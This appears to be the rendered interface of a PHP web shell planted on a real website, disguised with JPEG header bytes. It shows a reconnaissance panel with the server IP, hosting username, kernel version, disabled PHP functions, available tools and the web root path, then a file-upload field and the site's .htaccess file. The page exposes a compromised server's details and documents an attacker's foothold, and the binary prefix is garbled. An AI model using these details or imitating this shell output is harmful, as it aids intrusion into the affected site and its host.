���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/jeevikagaumaa.in/public_html/ |
Upload File : |
RewriteEngine on RewriteCond %{REQUEST_FILENAME}\.php -f RewriteRule ^(.*)$ $1.php RewriteCond %{REQUEST_FILENAME}\.html -f RewriteRule ^(.*)$ $1.html # Custom 404 Error Page ErrorDocument 404 /404.php # Prevent direct access to .htaccess file <Files .htaccess> Order Allow,Deny Deny from all </Files> <FilesMatch "\.(htaccess|htpasswd|ini|log|sh|bak|sql)$"> Order Allow,Deny Deny from all </FilesMatch> Options -Indexes <Limit GET POST> Order Allow,Deny Deny from 192.168.1.1 Allow from all </Limit> RewriteEngine On RewriteCond %{HTTP_REFERER} !^https://(www\.)?jeevikagaumaa\.in [NC] RewriteRule \.(jpg|jpeg|png|gif|bmp|pdf)$ - [F,NC,L] <IfModule mod_headers.c> Header set X-Content-Type-Options "nosniff" Header set X-Frame-Options "DENY" Header set X-XSS-Protection "1; mode=block" </IfModule> # Optionally, you can add more rewrite rules here if needed